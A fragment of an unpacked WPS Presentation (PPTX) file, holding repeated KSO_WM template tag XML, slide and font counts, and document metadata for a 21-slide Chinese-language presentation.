  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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054_4*l_h_i*1_4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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54_4*l_h_i*1_2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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54_4*l_h_i*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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54_4*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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54_4*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>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54_4*l_h_i*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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54_4*l_h_a*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.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54_4*l_h_f*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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54_4*l_h_a*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.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054_4*l_h_f*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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54_4*l_h_a*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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054_4*l_h_f*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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054_4*l_h_a*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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054_4*l_h_f*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>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2564</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>159</Paragraphs>
  <Slides>21</Slides>
  <Notes>1</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21</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="43" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>报隶-简</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>汉仪书宋二KW</vt:lpstr>
      <vt:lpstr>汉仪尚巍手书W</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Apple Color Emoji</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>汉仪中黑KW</vt:lpstr>
      <vt:lpstr>思源黑体 CN Regular</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南林鸢</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-07T15:37:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-07T15:37:18Z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93033423C10EB4071AB89965717D9BA2_41</vt:lpwstr>
  </property>
</Properties>
</file>